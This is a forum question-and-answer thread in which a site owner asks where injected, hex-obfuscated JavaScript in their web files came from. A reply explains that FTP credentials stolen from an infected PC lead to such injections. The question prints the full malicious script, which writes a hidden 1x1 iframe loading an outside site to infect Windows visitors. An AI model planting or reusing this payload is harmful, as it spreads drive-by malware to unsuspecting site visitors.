Reputation: 401
Where from is JavaScript malware?
I found this code in some .js files on my web.
var _0x3ba2=["\x3D","","\x6C\x65\x6E\x67\x74\x68","\x63\x6F\x6F\x6B\x69\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x3B","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x73\x74\x6F\x70\x65\x64","\x70\x6C\x61\x74\x66\x6F\x72\x6D","\x57\x69\x6E\x33\x32","\x61\x70\x70\x4E\x61\x6D\x65","\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x20\x49\x6E\x74\x65\x72\x6E\x65\x74\x20\x45\x78\x70\x6C\x6F\x72\x65\x72","\x4E\x65\x74\x73\x63\x61\x70\x65","\x34\x33\x32\x30\x30\x30\x20\x68\x6F\x75\x72\x73","\x67\x65\x74\x48\x6F\x75\x72\x73","\x73\x65\x74\x48\x6F\x75\x72\x73","\x73\x74\x6F\x70\x65\x64\x3D","\x3B\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x47\x4D\x54\x53\x74\x72\x69\x6E\x67","\x3C\x64\x69\x76\x20\x6E\x61\x6D\x65\x3D\x22\x79\x6F\x75\x74\x75\x62\x65\x22\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x77\x69\x64\x74\x68\x3D\x22\x31\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x31\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x61\x6E\x74\x72\x61\x2D\x73\x74\x6F\x6E\x65\x2E\x64\x65\x2F\x63\x6F\x6E\x74\x61\x63\x74\x2E\x70\x68\x70\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x22\x30\x22\x20\x61\x6C\x6C\x6F\x77\x66\x75\x6C\x6C\x73\x63\x72\x65\x65\x6E\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E","\x77\x72\x69\x74\x65"];function get_cookie(_0x2c9dx2){var _0x2c9dx3=_0x2c9dx2+_0x3ba2[0];var _0x2c9dx4=_0x3ba2[1];if(document[_0x3ba2[3]][_0x3ba2[2]]>0){offset=document[_0x3ba2[3]][_0x3ba2[4]](_0x2c9dx3);if(offset!=-1){offset+=_0x2c9dx3[_0x3ba2[2]];end=document[_0x3ba2[3]][_0x3ba2[4]](_0x3ba2[5],offset);if(end==-1){end=document[_0x3ba2[3]][_0x3ba2[2]];} ;_0x2c9dx4=unescape(document[_0x3ba2[3]][_0x3ba2[6]](offset,end));} ;} ;return _0x2c9dx4;} ;if(get_cookie(_0x3ba2[7])==_0x3ba2[1]&&navigator[_0x3ba2[8]]==_0x3ba2[9]){if(navigator[_0x3ba2[10]]==_0x3ba2[11]||navigator[_0x3ba2[10]]==_0x3ba2[12]){var popfrequency=_0x3ba2[13];var expireDate= new Date();expireDate[_0x3ba2[15]](expireDate[_0x3ba2[14]]()+parseInt(popfrequency));document[_0x3ba2[3]]=_0x3ba2[16]+parseInt(popfrequency)+_0x3ba2[17]+expireDate[_0x3ba2[18]]();document[_0x3ba2[20]](_0x3ba2[19]);} ;} ;
I can not explain where it came from? Is the only explanation that my FTP login leaked? Does anyone met with this? My web was banned like offensive web because of this.
Upvotes: 0
Views: 545
Answers (1)
Reputation: 1490
I had a similar problem like this with injected js code.
I had malware on my computer and after I had connected with filezilla on the FT,P some js code was injected, witch opened at the client a hidden iframe. This iframe infected the computer of the client when he entered the site.
Do a virus/malware clean and make sure you don't get infested again.
With the code you have been infected. you will probably infect clients who enter your site.
Fortunately your password was probably not leaked, this kind of js injection is an automated process, but I strongly recommand you to change the password from another clean computer.
Upvotes: 1
Related Questions
- Javascript "virus"
- Malicious JavaScript code
- How does this site infecting script work?
- Javascript Injected in browser
- How does Javascript Malware work?
- km0ae9gr6m js injection hack information
- JavaScript trojan dissection
- Javascript malicious injection / redirection by XML comment tags (JS/Exploit-Blacole.em)
- JavaScript code injected into site: Can you help me decrypt it?
- Malicious JavaScript-Code injected - but doing nothing malicious?